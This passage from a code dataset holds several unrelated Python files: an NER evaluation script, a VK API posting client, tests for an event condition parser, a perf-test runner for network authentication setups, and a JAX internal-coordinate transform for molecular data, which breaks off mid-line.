end.append(entity[1])\n label.append(entity[2])\n\nvalidationDF = pd.DataFrame({'content':content, 'start':start, 'end':end, 'label':label})\n\nv_content=[]\nv_text = []\nv_start = []\nv_end = []\nv_label = []\nfor sent in pd.Series(content).unique():\n doc = nlp1(sent)\n\n spacy.displacy.serve(doc, style=\"ent\")\n\n for ent in doc.ents:\n v_content.append(sent)\n v_text.append(ent.text)\n v_start.append(ent.start_char)\n v_end.append(ent.end_char)\n v_label.append(ent.label_) \n\npred_valid_DF = pd.DataFrame({'content':v_content, 'text':v_text, 'start':v_start, 'end':v_end, 'label':v_label})\n\nmerged = pd.merge(validationDF, pred_valid_DF[['start', 'end', 'text', 'content', 'label']], how = \"left\", on = ['content', 'start', 'end'], suffixes=['_valid', '_pred'])\n\nmerged[merged.label_valid != merged.label_pred]\n\n#####\n#\n#####\ndef get_cleaned_label(label: str):\n if \"-\" in label:\n return label.split(\"-\")[1]\n else:\n return label\n \n \ndef create_target_vector(doc):\n return [get_cleaned_label(label[2]) for label in doc[1][\"entities\"]]\n\n\ndef create_total_target_vector(docs):\n target_vector = []\n for doc in docs:\n target_vector.extend(create_target_vector(doc))\n return target_vector\n\n#####\n# Create Prediction Vector\n#####\ndef create_prediction_vector(text):\n return [get_cleaned_label(prediction) for prediction in get_all_ner_predictions(text)]\n\n \ndef create_total_prediction_vector(docs: list):\n prediction_vector = []\n for doc in docs:\n prediction_vector.extend(create_prediction_vector(doc[0]))\n return prediction_vector\n\ndef get_all_ner_predictions(text):\n doc = nlp1(text)\n entities = [(e.start_char, e.end_char, e.label_) for e in doc.ents]\n \n return entities\n\n#####\n# Confusion Matrix\n#####\nfrom sklearn.metrics import confusion_matrix\n\ndef generate_confusion_matrix(docs): \n classes = sorted(set(create_total_target_vector(docs)))\n y_true = create_total_target_vector(docs)\n predictions = create_total_prediction_vector(docs)\n\n y_pred = [pred[2] for pred in predictions]\n\n return confusion_matrix(y_true, y_pred)\n\ngenerate_confusion_matrix(validation_data)\n\n#####\n# Calculate Evaluation Metrics\n#####\n\n#Precision\n\n#Recall\n","repo_name":"onthemarq/coffee_app","sub_path":"endpoints/data/pipeline/testing_ner.py","file_name":"testing_ner.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3188135177","text":"from typing import IO, List, Union\n\nimport requests\n\nfrom api.models import PlatformPost\nfrom custom_types import JSON\n\n\ndef get_authorization_url(client_id: int, api_version: float) -> str:\n \"\"\"\n Returns a string with url for authorization.\n\n By following the url, you will be asked by VK to give access to the application.\n After agreement, a blank page will be displayed, and there will be an access token\n in the address bar. 
This token is required by functions below.\n \"\"\"\n url = (\n 'https://oauth.vk.com/authorize?client_id={client_id}&response_type=token&' +\n 'scope=wall,offline,groups,photos,docs&v={api_version}&' +\n 'redirect_uri=https://oauth.vk.com/blank.html'\n ).format(\n client_id=client_id, api_version=api_version,\n )\n return url\n\n\ndef send_post_to_group(\n token: str, group_id: int, api_version: float, post: PlatformPost,\n) -> JSON:\n \"\"\"\n Sends post to vk group on behalf of the group itself.\n \"\"\"\n vk_api = VkAPI(token, api_version)\n attachments: List[str] = []\n # TODO: Add attachments uploading according to PlatformPost changes\n return vk_api.send_post_to_group_wall(group_id, post.text_for_posting, attachments)\n\n\nclass VkAPIError(Exception):\n \"\"\"\n Vk API base exception.\n \"\"\"\n\n def __init__(self, method: str, payload: JSON, response: bytes):\n \"\"\"\n Init error.\n \"\"\"\n message = '{0} {1} {2}'.format(method, payload, response)\n super().__init__(message)\n\n\nclass VkAPI(object):\n \"\"\"\n Local mini client for vk API.\n\n Its purpose is to share token, api version, and error handling among the api methods.\n \"\"\"\n\n def __init__(self, token: str, api_version: float):\n \"\"\"\n Init client.\n \"\"\"\n self._token = token\n self._api_version = api_version\n self._url = 'https://api.vk.com/method/'\n\n def send_post_to_group_wall(\n self,\n group_id: int,\n message: str,\n attachments: Union[List[str], None] = None,\n ) -> JSON:\n \"\"\"\n Sends post to vk group on behalf of the group itself.\n \"\"\"\n payload = {\n 'owner_id': -group_id,\n 'from_group': 1,\n 'message': message,\n }\n if attachments:\n payload['attachment'] = ','.join(attachments)\n return self._request(\n 'wall.post',\n payload=payload,\n )\n\n def upload_doc(self, doc: IO[bytes]) -> str:\n \"\"\"\n Uploads and saves doc on the server.\n \"\"\"\n upload_url = self._request('docs.getWallUploadServer')['upload_url']\n\n uploaded_doc = self._upload_media(upload_url, doc)\n\n saved_doc = self._request(\n 'docs.save',\n {'file': uploaded_doc['file']},\n )['doc']\n return 'doc{0}_{1}'.format(saved_doc['owner_id'], saved_doc['id'])\n\n def upload_photo(self, group_id: int, photo: IO[bytes]) -> str:\n \"\"\"\n Uploads and saves photo in the community wall photos.\n \"\"\"\n upload_url = self._request(\n 'photos.getWallUploadServer',\n {'group_id': group_id},\n )['upload_url']\n\n uploaded_photo = self._upload_media(upload_url, photo)\n\n saved_photo = self._request(\n 'photos.saveWallPhoto', {\n 'group_id': group_id,\n 'server': uploaded_photo['server'],\n 'hash': uploaded_photo['hash'],\n 'photo': uploaded_photo['photo'],\n },\n )[0]\n return 'photo{0}_{1}'.format(saved_photo['owner_id'], saved_photo['id'])\n\n def _request(self, method: str, payload: JSON = None) -> JSON:\n \"\"\"\n Sends request to the VK API method with the given payload.\n \"\"\"\n if payload is None:\n payload = {}\n payload.update({\n 'v': self._api_version,\n 'access_token': self._token,\n })\n response = requests.post(self._url + method, data=payload)\n if response.status_code != requests.codes.ok or 'error' in response.json():\n raise VkAPIError(method, payload, response.content)\n return response.json()['response']\n\n def _upload_media(self, upload_url: str, media: IO[bytes]) -> JSON:\n \"\"\"\n Upload media to the VK server.\n \"\"\"\n response = requests.post(upload_url, files={'file': media})\n if response.status_code != requests.codes.ok or 'error' in response.json():\n raise VkAPIError(upload_url, {'file': 
media.name}, response.content)\n return response.json()\n","repo_name":"piterpy-meetup/postpost","sub_path":"postpost/gates/vkontakte.py","file_name":"vkontakte.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"13896825959","text":"import datetime\n\nfrom freezegun import freeze_time\nimport pytest\n\nfrom zconnect.util.event_condition_parser import Condition\n\nfreezer_ts = 1400000000\nfreezer_time = datetime.datetime.utcfromtimestamp(freezer_ts)\nfreezer_string = freezer_time.isoformat()\n\nlong_before = freezer_ts - 100000\nbefore = freezer_ts - 1000\nafter = freezer_ts + 1000\n\nseconds_before = freezer_ts - 30 # 30 seconds before\nmins_before = freezer_ts - 120 # 2 mins before\nhours_before = freezer_ts - 7200 # 2 hours before\ndays_before = freezer_ts - 172800 # 2 days before\nweeks_before = freezer_ts - 1209600 # 2 weeks before\nmonths_before = freezer_ts - 5184000 # 60 days before\nyears_before = freezer_ts - 51840000 # 600 days before\n\ndef time_since_midnight(input):\n return (input - input.replace(hour=0, minute=0, second=0, microsecond=0))\n\n# Conditions needed for test cases\nconditions = [\n Condition(\"temp==10\"), #0\n Condition(\"temp>=10\"), #1\n Condition(\"temp<25\"), #2\n Condition(\"temp<25 && temp>=10\"), #3\n Condition(\"(temp != 10) && (temp<=25)\"), #4\n Condition(\"(temp<10) || (temp>25)\"), #5\n Condition(\"hum>70\"), #6\n Condition(\"pir:motion==true\"), #7\n Condition(\"day==1\"), #8\n Condition(\"day==1 && time==300\"), #9\n Condition(\"time=={}\".format(time_since_midnight(freezer_time).total_seconds())), # 10\n Condition(\"nested_state:away==true\"), #11\n Condition(\"period==minutely\"), # 12\n Condition(\"period==hourly\"), # 13\n Condition(\"period==daily\"), # 14\n Condition(\"period==weekly\"), # 15\n Condition(\"period==monthly\"), # 16\n Condition(\"period==yearly\"), # 17\n Condition(\"pir:motion==true && temp>=10\"), #18\n Condition(\"nested_state:schedule_on==true&&nested_state:away==false\"), #19\n Condition(\"non_existant:field==true\"), #20\n Condition(\"fvalue==false\"), #21\n Condition(\"\") #22\n]\n\n@pytest.mark.parametrize(\"condition, context, expected\", [\n (conditions[0], {\"temp\": 10}, True),\n (conditions[0], {\"temp\": -10}, False),\n (conditions[0], {\"temp\": 20}, False),\n (conditions[1], {\"temp\": 30}, True),\n (conditions[1], {\"temp\": 9}, False),\n (conditions[1], {\"temp\": 10}, True),\n (conditions[2], {\"temp\": 30}, False),\n (conditions[2], {\"temp\": 25}, False),\n (conditions[2], {\"temp\": 9}, True),\n (conditions[3], {\"temp\": 30}, False),\n (conditions[3], {\"temp\": 15}, True),\n (conditions[3], {\"temp\": 9}, False),\n (conditions[4], {\"temp\": 10}, False),\n (conditions[4], {\"temp\": 11}, True),\n (conditions[4], {\"temp\": 26}, False),\n (conditions[5], {\"temp\": 26}, True),\n (conditions[5], {\"temp\": 9}, True),\n (conditions[5], {\"temp\": 10}, False),\n (conditions[5], {\"temp\": 25}, False),\n (conditions[6], {\"hum\": 60}, False),\n (conditions[6], {\"hum\": 75, \"temp\": 12}, True),\n (conditions[7], {\"pir\": {\"motion\": True}}, True),\n (conditions[7], {\"pir\": {\"motion\": False}}, False),\n (conditions[18], {\"pir\": {\"motion\": True}, \"temp\": 25}, True),\n (conditions[18], {\"pir\": {\"motion\": True}, \"temp\": 5}, False),\n (conditions[18], {\"pir\": {\"motion\": False}, \"temp\": 25}, False),\n (conditions[19], {\"nested_state\": {\"schedule_on\": True, \"away\": False}}, True),\n 
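 # NB: the a:b syntax in a Condition string is a nested lookup into the context
 # dict; conditions[19] above, for instance, reads context[\"nested_state\"][\"schedule_on\"]
 # and context[\"nested_state\"][\"away\"] before combining the two checks with &&.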
(conditions[19], {\"nested_state\": {\"schedule_on\": False, \"away\": False}}, False),\n (conditions[19], {\"nested_state\": {\"schedule_on\": True, \"away\": True}}, False),\n (conditions[20], {}, False),\n (conditions[21], {\"fvalue\": False}, True),\n (conditions[22], {}, False)\n])\ndef test_condition_parser(condition, context, expected):\n assert condition.evaluate(context=context, last_eval_time=100) == expected\n\n@pytest.mark.parametrize(\"test_name, condition, last_eval_time, context, expected\", [\n (\"1\", conditions[8], 100, {\"day\": 0}, True), # Monday\n (\"2\", conditions[8], 100, {\"day\": 0}, True), # Monday\n (\"3\", conditions[0], 100, {\"day\": 0}, False), # Monday\n (\"4\", conditions[8], 100, {\"day\": 0, \"temp\": 100}, True), # Monday\n (\"5\", conditions[8], long_before, {\"temp\": 100}, True), # Monday\n (\"6\", conditions[9], long_before, {\"temp\": 100}, True), # Monday\n (\"7\", conditions[10], long_before, {\"temp\": 100}, True), # Monday\n (\"8\", conditions[11], 100, {\"nested_state\": {\"away\": True}}, True),\n (\"9\", conditions[11], 100, {\"nested_state\": {\"away\": False}}, False),\n (\"10\", conditions[10], freezer_ts, {}, False), # Last evaluated now - shouldn't test again\n (\"11\", conditions[10], after, {}, False), # Last evaluated in the future\n (\"12\", conditions[10], before, {}, True),\n (\"13\", conditions[12], seconds_before, {}, False),\n (\"14\", conditions[12], mins_before, {}, True),\n (\"15\", conditions[13], mins_before, {}, False),\n (\"16\", conditions[13], hours_before, {}, True),\n (\"17\", conditions[14], hours_before, {}, False),\n (\"18\", conditions[14], days_before, {}, True),\n (\"19\", conditions[15], days_before, {}, False),\n (\"20\", conditions[15], weeks_before, {}, True),\n (\"21\", conditions[16], weeks_before, {}, False),\n (\"22\", conditions[16], months_before, {}, True),\n (\"23\", conditions[17], months_before, {}, False),\n (\"24\", conditions[17], years_before, {}, True),\n])\n\n@freeze_time(freezer_string)\ndef test_condition_day_parser(test_name, condition, last_eval_time, context, expected):\n print(\"Test: {}\".format(test_name))\n assert condition.evaluate(context=context, last_eval_time=last_eval_time) == expected\n","repo_name":"zconnect-iot/zconnect-django","sub_path":"tests/utils/test_event_condition_parser.py","file_name":"test_event_condition_parser.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"41474770581","text":"import argparse\nimport logging\nimport io\nimport os\nimport subprocess\n\nfrom paramiko import SSHConfig\n\nfrom logger import TestingLogger\nfrom perf.state import NetworkState, NetworkStateConfig, ConnectionConfig\nfrom perf.setups.local_auth import LocalAuthSetup\nfrom perf.setups.home_auth import HomeAuthSetup\nfrom perf.setups.backup_auth import BackupAuthSetup\nimport yaml\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Run the specified perf tests\")\n\n parser.add_argument(\n \"-p\",\n \"--network-config\",\n required=True,\n type=str,\n help=\"Path to config for the network, i.e. 
hostnames\",\n )\n\n parser.add_argument(\n \"-d\",\n \"--vagrant-dir\",\n required=False,\n type=str,\n help=\"Optional vagrantfile directory\",\n )\n\n parser.add_argument(\n \"-c\",\n \"--config-dir\",\n required=True,\n type=str,\n help=\"Config directory for perf device/service configs\",\n )\n\n parser.add_argument(\n \"-u\",\n \"--ue-driver\",\n required=True,\n type=str,\n help=\"UE driver file path\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--num-ues\",\n required=True,\n type=int,\n help=\"Number of UEs\",\n )\n\n parser.add_argument(\n \"-i\",\n \"--interval\",\n required=True,\n type=int,\n help=\"Interval in milliseconds to connect and reconnect\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--iterations\",\n required=True,\n type=int,\n help=\"Number of times to reconnect\",\n )\n\n parser.add_argument(\n \"-k\",\n \"--key-threshold\",\n required=False,\n type=int,\n help=\"Set key threshold for backup auth\",\n )\n\n parser.add_argument(\n \"--debug\",\n action=\"store_true\",\n help=\"Change logging level to debug\",\n )\n\n # select one of the following setups\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\n \"--local-auth\",\n action=\"store_true\",\n help=\"Configure the network for local auth\",\n )\n group.add_argument(\n \"--home-auth\",\n action=\"store_true\",\n help=\"Configure the network for home auth\",\n )\n group.add_argument(\n \"--backup-auth\",\n action=\"store_true\",\n help=\"Configure the network for backup auth\",\n )\n\n args = parser.parse_args()\n\n # if args.num_ues <= 10:\n # # Increase the number of samples but at the same steady-state rate\n # args.num_ues = args.num_ues * 100\n # args.interval = args.interval * 100\n # elif args.num_ues < 100:\n # # Increase the number of samples but at the same steady-state rate\n # args.num_ues = args.num_ues * 10\n # args.interval = args.interval * 10\n\n if args.debug:\n TestingLogger.logger.setLevel(logging.DEBUG)\n else:\n TestingLogger.logger.setLevel(logging.INFO)\n\n TestingLogger.logger.info(\"Building state and connecting...\")\n config = NetworkStateConfig(args.config_dir, args.ue_driver)\n\n build_config(\n config, yaml.safe_load(open(args.network_config, \"r\")), args.vagrant_dir\n )\n\n state = NetworkState(config)\n\n if args.local_auth:\n setup = LocalAuthSetup(state)\n elif args.home_auth:\n setup = HomeAuthSetup(state)\n elif args.backup_auth:\n setup = BackupAuthSetup(state)\n else:\n raise Exception(\"No setup specified\")\n\n if args.key_threshold:\n setup.key_threshold = args.key_threshold\n\n setup.run_perf(args.num_ues, args.interval, args.iterations)\n\n\ndef build_config(config: NetworkStateConfig, network: dict, vagrant_dir: str) -> None:\n vagrant_config = None\n if vagrant_dir:\n vagrant_config = SSHConfig()\n vagrant_config.parse(\n io.StringIO(\n subprocess.check_output(\n [\"vagrant\", \"ssh-config\"], cwd=vagrant_dir\n ).decode()\n )\n )\n\n config.directory_config = handle_connection(network[\"directory\"], vagrant_config)\n config.ueransim_config = handle_connection(network[\"ueransim\"], vagrant_config)\n for service in network[\"services\"]:\n config.service_configs.append(handle_connection(service, vagrant_config))\n\n\ndef handle_connection(\n connection_info: dict, vagrant_config: SSHConfig\n) -> ConnectionConfig:\n if connection_info[\"is_vagrant\"]:\n if not vagrant_config:\n raise Exception(\"No vagrant dir specified\")\n\n ssh_info = vagrant_config.lookup(connection_info[\"hostname\"])\n\n conf = ConnectionConfig(\n 
ssh_info[\"hostname\"],\n connection_info[\"id\"],\n ssh_info[\"user\"],\n int(ssh_info[\"port\"]),\n ssh_info[\"identityfile\"][0],\n )\n\n conf.service_ip = connection_info.get(\"service_ip\")\n conf.directory_addr = connection_info.get(\"directory_addr\")\n return conf\n else:\n return ConnectionConfig(\n connection_info[\"hostname\"],\n connection_info[\"id\"],\n \"ictd\", # TODO: look into this,\n 22,\n os.path.expanduser(\"~/.ssh/id_rsa\"),\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"uw-ictd/dAuth","sub_path":"testing/perf/run_perf.py","file_name":"run_perf.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"38169887791","text":"from jax import numpy as jnp\nimport numpy as np\n\nfrom . import numerical\nfrom . import graph\n\n\nclass InternalCoordinateTransform:\n def __init__(self, dims, z_indices=None, cart_indices=None, data=None,\n ind_circ_dih=[], shift_dih=False,\n shift_dih_params={'hist_bins': 100},\n default_std={'bond': 0.005, 'angle': 0.15, 'dih': 0.2}):\n self.dims = dims\n # Setup indexing.\n self._setup_indices(z_indices, cart_indices)\n self._validate_data(data)\n # Setup the mean and standard deviations for each internal coordinate.\n transformed, _ = self._fwd(data)\n # Normalize\n self.default_std = default_std\n self.ind_circ_dih = ind_circ_dih\n self._setup_mean_bonds(transformed)\n transformed = transformed.at[..., self.bond_indices].set(transformed[..., self.bond_indices] - self.mean_bonds)\n self._setup_std_bonds(transformed)\n transformed = transformed.at[..., self.bond_indices].set(transformed[..., self.bond_indices] / self.std_bonds)\n self._setup_mean_angles(transformed)\n transformed = transformed.at[..., self.angle_indices].set(transformed[..., self.angle_indices] - self.mean_angles)\n self._setup_std_angles(transformed)\n transformed = transformed.at[..., self.angle_indices].set(transformed[..., self.angle_indices] / self.std_angles)\n self._setup_mean_dih(transformed)\n transformed = transformed.at[..., self.dih_indices].set(transformed[..., self.dih_indices] - self.mean_dih)\n transformed = self._fix_dih(transformed)\n self._setup_std_dih(transformed)\n transformed = transformed.at[..., self.dih_indices].set(transformed[..., self.dih_indices] / self.std_dih)\n if shift_dih:\n val = jnp.linspace(-np.pi, np.pi,\n shift_dih_params['hist_bins'])\n for i in self.ind_circ_dih:\n dih = transformed[:, self.dih_indices[i]]\n dih = dih * self.std_dih[i] + self.mean_dih[i]\n dih = (dih + np.pi) % (2 * np.pi) - np.pi\n hist, _ = jnp.histogram(dih, bins=shift_dih_params['hist_bins'],\n range=[-np.pi, np.pi])\n self.mean_dih[i] = val[jnp.argmin(hist)] + np.pi\n dih = (dih - self.mean_dih[i]) / self.std_dih[i]\n dih = (dih + np.pi) % (2 * np.pi) - np.pi\n transformed[:, self.dih_indices[i]] = dih\n scale_jac = -(\n jnp.sum(jnp.log(self.std_bonds))\n + jnp.sum(jnp.log(self.std_angles))\n + jnp.sum(jnp.log(self.std_dih))\n )\n self.scale_jac = scale_jac\n\n def forward(self, x, context=None):\n trans, jac = self._fwd(x)\n trans = trans.at[..., self.bond_indices].set((trans[..., self.bond_indices] - self.mean_bonds) / self.std_bonds)\n trans = trans.at[..., self.angle_indices].set((trans[..., self.angle_indices] - self.mean_angles) / self.std_angles)\n trans = trans.at[..., self.dih_indices].set(trans[..., self.dih_indices] - self.mean_dih)\n trans = self._fix_dih(trans)\n trans = trans.at[..., self.dih_indices].set(trans[..., self.dih_indices] / 
 return trans, jac + self.scale_jac\n\n def _fwd(self, x):\n # we can do everything in parallel...\n inds1 = self.inds_for_atom[self.rev_z_indices[:, 1]]\n inds2 = self.inds_for_atom[self.rev_z_indices[:, 2]]\n inds3 = self.inds_for_atom[self.rev_z_indices[:, 3]]\n inds4 = self.inds_for_atom[self.rev_z_indices[:, 0]]\n\n # Calculate the bonds, angles, and torsions for a batch.\n bonds = numerical.calc_bonds(inds1, inds4, coords=x)\n angles = numerical.calc_angles(inds2, inds1, inds4, coords=x)\n dihedrals = numerical.calc_dihedrals(inds3, inds2, inds1, inds4, coords=x)\n\n jac = -jnp.sum(\n 2 * jnp.log(bonds) + jnp.log(jnp.abs(jnp.sin(angles))), axis=-1\n )\n\n # Replace the cartesian coordinates with internal coordinates.\n x = x.at[..., inds4[:, 0]].set(bonds)\n x = x.at[..., inds4[:, 1]].set(angles)\n x = x.at[..., inds4[:, 2]].set(dihedrals)\n return x, jac\n\n def inverse(self, x, context=None):\n # Gather all of the atoms represented as cartesian coordinates.\n cart_shape = (-1, 3)\n if x.ndim == 2:\n cart_shape = (x.shape[0],) + cart_shape\n cart = x[..., self.init_cart_indices].reshape(*cart_shape)\n\n # Setup the log abs det jacobian\n jac = jnp.zeros(x.shape[:-1])\n\n # Loop over all of the blocks, where all of the atoms in each block\n # can be built in parallel because they only depend on atoms that\n # are already cartesian. `atoms_to_build` lists the `n` atoms\n # that can be built as a batch, where the indexing refers to the\n # original atom order. `ref_atoms` has size n x 3, where the indexing\n # refers to the position in `cart`, rather than the original order.\n for block in self.rev_blocks:\n atoms_to_build = block[:, 0]\n ref_atoms = block[:, 1:]\n\n # Get all of the bonds by retrieving the appropriate columns and\n # un-normalizing.\n bonds = (\n x[..., 3 * atoms_to_build]\n * self.std_bonds[self.atom_to_stats[atoms_to_build]]\n + self.mean_bonds[self.atom_to_stats[atoms_to_build]]\n )\n\n # Get all of the angles by retrieving the appropriate columns and\n # un-normalizing.\n angles = (\n x[..., 3 * atoms_to_build + 1]\n * self.std_angles[self.atom_to_stats[atoms_to_build]]\n + self.mean_angles[self.atom_to_stats[atoms_to_build]]\n )\n # Get all of the dihedrals by retrieving the appropriate columns and\n # un-normalizing.\n dihs = (\n x[..., 3 * atoms_to_build + 2]\n * self.std_dih[self.atom_to_stats[atoms_to_build]]\n + self.mean_dih[self.atom_to_stats[atoms_to_build]]\n )\n\n # Fix the dihedrals to lie in [-pi, pi].\n dihs = jnp.where(dihs < np.pi, dihs + 2 * np.pi, dihs)\n dihs = jnp.where(dihs > np.pi, dihs - 2 * np.pi, dihs)\n\n # Compute the cartesian coordinates for the newly placed atoms.\n new_cart, cart_jac = numerical.reconstruct_cart(cart, ref_atoms, bonds, angles, dihs)\n jac = jac + cart_jac\n\n # Concatenate the cartesian coordinates for the newly placed\n # atoms onto the full set of cartesian coordinates.\n cart = jnp.concatenate([cart, new_cart], axis=-2)\n # Permute cart back into the original order and flatten.\n cart = cart[..., self.rev_perm_inv, :]\n cart = cart.reshape(*cart_shape[:-1])\n return cart, jac - self.scale_jac\n\n def _setup_mean_bonds(self, x):\n self.mean_bonds = jnp.mean(x[:, self.bond_indices], axis=0)\n\n def _setup_std_bonds(self, x):\n # Adding 1e-4 might help for numerical stability but results in some\n # dimensions being not properly normalised e.g. 
bond lengths\n # which can have stds of the order 1e-7\n # The flow will then have to fit to a very concentrated dist\n if x.shape[0] > 1:\n self.std_bonds = jnp.std(x[:, self.bond_indices], axis=0)\n else:\n self.std_bonds = jnp.ones_like(self.mean_bonds) \\\n * self.default_std['bond']\n\n def _setup_mean_angles(self, x):\n self.mean_angles = jnp.mean(x[:, self.angle_indices], axis=0)\n\n def _setup_std_angles(self, x):\n if x.shape[0] > 1:\n self.std_angles = jnp.std(x[:, self.angle_indices], axis=0)\n else:\n self.std_angles = jnp.ones_like(self.mean_angles) \\\n * self.default_std['angle']\n\n def _setup_mean_dih(self, x):\n sin = jnp.mean(jnp.sin(x[:, self.dih_indices]), axis=0)\n cos = jnp.mean(jnp.cos(x[:, self.dih_indices]), axis=0)\n self.mean_dih = jnp.arctan2(sin, cos)\n\n def _fix_dih(self, x):\n dih = x[..., self.dih_indices]\n dih = (dih + np.pi) % (2 * np.pi) - np.pi\n return x.at[..., self.dih_indices].set(dih)\n\n def _setup_std_dih(self, x):\n if x.shape[0] > 1:\n self.std_dih = jnp.std(x[:, self.dih_indices], axis=0)\n else:\n std_dih = jnp.ones_like(self.mean_dih) \\\n * self.default_std['dih']\n self.std_dih = std_dih.at[self.ind_circ_dih].set(1.)\n\n def _validate_data(self, data):\n if data is None:\n raise ValueError(\n \"InternalCoordinateTransform must be supplied with training_data.\"\n )\n\n if len(data.shape) != 2:\n raise ValueError(\"training_data must be n_samples x n_dim array\")\n\n n_dim = data.shape[1]\n\n if n_dim != self.dims:\n raise ValueError(\n f\"training_data must have {self.dims} dimensions, not {n_dim}.\"\n )\n\n def _setup_indices(self, z_indices, cart_indices):\n n_atoms = self.dims // 3\n self.inds_for_atom = jnp.arange(n_atoms * 3).reshape(n_atoms, 3)\n\n sorted_z_indices = graph.topological_sort(z_indices)\n sorted_z_indices = [\n [item[0], item[1][0], item[1][1], item[1][2]] for item in sorted_z_indices\n ]\n rev_z_indices = list(reversed(sorted_z_indices))\n\n mod = [item[0] for item in sorted_z_indices]\n modified_indices = []\n for index in mod:\n modified_indices.extend(self.inds_for_atom[index])\n bond_indices = list(modified_indices[0::3])\n angle_indices = list(modified_indices[1::3])\n dih_indices = list(modified_indices[2::3])\n\n self.modified_indices = jnp.array(modified_indices, dtype=int)\n self.bond_indices = jnp.array(bond_indices, dtype=int)\n self.angle_indices = jnp.array(angle_indices, dtype=int)\n self.dih_indices = jnp.array(dih_indices, dtype=int)\n self.sorted_z_indices = jnp.array(sorted_z_indices, dtype=int)\n self.rev_z_indices = jnp.array(rev_z_indices, dtype=int)\n\n #\n # Setup indexing for reverse pass.\n #\n # First, create an array that maps from an atom index into mean_bonds, std_bonds, etc.\n atom_to_stats = jnp.zeros(n_atoms, dtype=int)\n for i, j in enumerate(mod):\n atom_to_stats = atom_to_stats.at[j].set(i)\n self.atom_to_stats = atom_to_stats\n\n # Next create permutation vector that is used in the reverse pass. This maps\n # from the original atom indexing to the order that the cartesian coordinates\n # will be built in. This will be filled in as we go.\n rev_perm = jnp.zeros(n_atoms, dtype=int)\n # Next create the inverse of rev_perm. 
This will be filled in as we go.\n rev_perm_inv = jnp.zeros(n_atoms, dtype=int)\n\n # Create the list of columns that form our initial cartesian coordinates.\n init_cart_indices = self.inds_for_atom[jnp.array(cart_indices)].reshape(-1)\n self.init_cart_indices = init_cart_indices\n\n # Update our permutation vectors for the initial cartesian atoms.\n for i, j in enumerate(cart_indices):\n rev_perm = rev_perm.at[i].set(j)\n rev_perm_inv = rev_perm_inv.at[j].set(i)\n\n # Break Z into blocks, where all of the atoms within a block can be built\n # in parallel, because they only depend on already-cartesian atoms.\n all_cart = set(cart_indices)\n current_cart_ind = i + 1\n blocks = []\n while sorted_z_indices:\n next_z_indices = []\n next_cart = set()\n block = []\n for atom1, atom2, atom3, atom4 in sorted_z_indices:\n if (atom2 in all_cart) and (atom3 in all_cart) and (atom4 in all_cart):\n # We can build this atom from existing cartesian atoms, so we add\n # it to the list of cartesian atoms available for the next block.\n next_cart.add(atom1)\n\n # Add this atom to our permutation matrices.\n rev_perm = rev_perm.at[current_cart_ind].set(atom1)\n rev_perm_inv = rev_perm_inv.at[atom1].set(current_cart_ind)\n current_cart_ind += 1\n\n # Next, we convert the indices for atoms2-4 from their normal values\n # to the appropriate indices to index into the cartesian array.\n atom2_mod = rev_perm_inv[atom2]\n atom3_mod = rev_perm_inv[atom3]\n atom4_mod = rev_perm_inv[atom4]\n\n # Finally, we append this information to the current block.\n\n block.append([atom1, atom2_mod, atom3_mod, atom4_mod])\n else:\n # We can't build this atom from existing cartesian atoms,\n # so put it on the list for next time.\n next_z_indices.append([atom1, atom2, atom3, atom4])\n sorted_z_indices = next_z_indices\n all_cart = all_cart.union(next_cart)\n block = jnp.array(block, dtype=int)\n blocks.append(block)\n self.rev_perm = rev_perm\n self.rev_perm_inv = rev_perm_inv\n self.rev_blocks = blocks\n\n def _periodic_angle_loss(self, angles):\n \"\"\"\n Penalizes angles outside the range [-pi, pi]\n\n Prevents violating invertibility in internal coordinate transforms.\n Computes\n\n L = (a-pi) ** 2 for a > pi\n L = (a+pi) ** 2 for a < -pi\n\n and returns the sum over all angles per batch.\n \"\"\"\n positive_loss = jnp.sum(jnp.where(angles > np.pi, angles - np.pi, 0) ** 2, axis=-1)\n negative_loss = jnp.sum(jnp.where(angles < -np.pi, angles + np.pi, 0) ** 2, axis=-1)\n return positive_loss + negative_loss\n\n\n\nclass CompleteInternalCoordinateTransform:\n def __init__(\n self,\n n_dim,\n z_mat,\n cartesian_indices,\n data,\n ind_circ_dih=[],\n shift_dih=False,\n shift_dih_params={'hist_bins': 100},\n default_std={'bond': 0.005, 'angle': 0.15, 'dih': 0.2}\n ):\n super().__init__()\n # cartesian indices are the atom indices of the atoms that are not\n # represented in internal coordinates but are left as cartesian\n # e.g. 
for 22 atoms it could be [4, 5, 6, 8, 14, 15, 16, 18]\n self.n_dim = n_dim\n self.len_cart_inds = len(cartesian_indices)\n assert self.len_cart_inds == 3\n\n # Create our internal coordinate transform\n self.ic_transform = InternalCoordinateTransform(\n n_dim, z_mat, cartesian_indices, data, ind_circ_dih,\n shift_dih, shift_dih_params, default_std\n )\n\n # permute puts the cartesian coords first then the internal ones\n # permute_inv does the opposite\n permute = jnp.zeros(n_dim, dtype=int)\n permute_inv = jnp.zeros(n_dim, dtype=int)\n all_ind = cartesian_indices + [row[0] for row in z_mat]\n for i, j in enumerate(all_ind):\n permute = permute.at[3 * i + 0].set(3 * j + 0)\n permute = permute.at[3 * i + 1].set(3 * j + 1)\n permute = permute.at[3 * i + 2].set(3 * j + 2)\n permute_inv = permute_inv.at[3 * j + 0].set(3 * i + 0)\n permute_inv = permute_inv.at[3 * j + 1].set(3 * i + 1)\n permute_inv = permute_inv.at[3 * j + 2].set(3 * i + 2)\n self.permute = permute\n self.permute_inv = permute_inv\n\n data = data[:, self.permute]\n b1, b2, angle = self._convert_last_internal(data[:, :3 * self.len_cart_inds])\n self.mean_b1 = jnp.mean(b1)\n self.mean_b2 = jnp.mean(b2)\n self.mean_angle = jnp.mean(angle)\n if b1.shape[0] > 1:\n self.std_b1 = jnp.std(b1)\n self.std_b2 = jnp.std(b2)\n self.std_angle 